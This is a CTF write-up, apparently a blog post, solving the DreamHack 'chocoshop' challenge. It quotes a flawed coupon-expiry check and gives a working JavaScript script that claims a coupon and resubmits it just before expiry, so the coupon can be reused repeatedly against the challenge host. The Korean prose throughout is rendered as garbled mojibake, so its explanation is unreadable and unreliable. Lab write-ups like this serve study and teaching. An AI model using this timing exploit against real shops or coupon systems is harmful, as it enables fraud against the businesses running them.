๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
๐ŸดCTF/DreamHack

DreamHack - chocoshop ํ’€์ด

by Janger 2023. 9. 9.
728x90

 

์ทจ์•ฝ์ 

r.expire(used_coupon, timedelta(seconds=coupon['expiration'] - int(time())))

์šฐ์„  ์ด๋ ‡๊ฒŒ ์‚ฌ์šฉํ•œ ์ฟ ํฐ์„ (์ฟ ํฐ๋งŒ๋ฃŒ์‹œ๊ฐ„ + ํ˜„์žฌ์‹œ๊ฐ„) ๋’ค์— ์ œ๊ฑฐํ•˜๋Š” ๊ฒƒ์ด ์ข€ ์ˆ˜์ƒํ–ˆ๊ณ 

if coupon['expiration'] < int(time()):
    raise BadRequest('Coupon expired!')

์กฐ๊ฑด์ด <=๊ฐ€ ์•„๋‹ˆ๋ผ <์ด๊ธฐ ๋•Œ๋ฌธ์— ์ •ํ™•ํžˆ ๋งŒ๋ฃŒ ๊ธฐ๊ฐ„์ธ 45์ดˆ์™€ 44์ดˆ ์‚ฌ์ด์— ๋‹ค์‹œ ์š”์ฒญ์„ ํ•˜๋ฉด ์ด ์กฐ๊ฑด๋ฌธ์„ ํ”ผํ•  ์ˆ˜ ์žˆ์ง€ ์•Š์„๊นŒ ์ƒ๊ฐํ–ˆ๋‹ค.

์ž๋™ํ™” ์ฝ”๋“œ

var url = "http://host3.dreamhack.games:10476";

for(var i=0; i<10; i++){

  await fetch(url+"/session", {
    "headers": {
      "accept": "*/*",
      "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7",
      "proxy-connection": "keep-alive"
    },
    "referrer": url+"/",
    "referrerPolicy": "strict-origin-when-cross-origin",
    "body": null,
    "method": "GET",
    "mode": "cors",
    "credentials": "omit"
  }).then(res => res.json()).then(res => {
    var authorization = res.session;
  
    fetch(url+"/coupon/claim", {
    "headers": {
      "accept": "*/*",
      "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7",
      "authorization": authorization,
      "proxy-connection": "keep-alive"
    },
    "referrer": url+"/",
    "referrerPolicy": "strict-origin-when-cross-origin",
    "body": null,
    "method": "GET",
    "mode": "cors",
    "credentials": "include"
  }).then(res => res.json()).then(res => { 
    var coupon = res.coupon; 
  
    fetch(url+"/coupon/submit", {
      "headers": {
        "accept": "*/*",
        "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7",
        "authorization": authorization,
        "coupon": coupon,
        "proxy-connection": "keep-alive"
      },
      "referrer": url+"/",
      "referrerPolicy": "strict-origin-when-cross-origin",
      "body": null,
      "method": "GET",
      "mode": "cors",
      "credentials": "include"
    });
  
    setTimeout(function() {
  
      fetch(url+"/coupon/submit", {
        "headers": {
          "accept": "*/*",
          "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7",
          "authorization": authorization,
          "coupon": coupon,
          "proxy-connection": "keep-alive"
        },
        "referrer": url+"/",
        "referrerPolicy": "strict-origin-when-cross-origin",
        "body": null,
        "method": "GET",
        "mode": "cors",
        "credentials": "include"
      });
  
    }, 44999);
  
  });
  
  });
  
}```
728x90

'๐ŸดCTF > DreamHack' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

DreamHack - [wargame.kr] strcmp ํ’€์ด  (0) 2023.09.11
DreamHack - CSP Bypass Advanced ํ’€์ด  (0) 2023.09.10
DreamHack - funjs ํ’€์ด  (0) 2023.09.09
DreamHack - [wargame.kr] tmitter ํ’€์ด  (0) 2023.09.09
DreamHack - [wargame.kr] crack crack crack it ํ’€์ด  (0) 2023.09.09

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”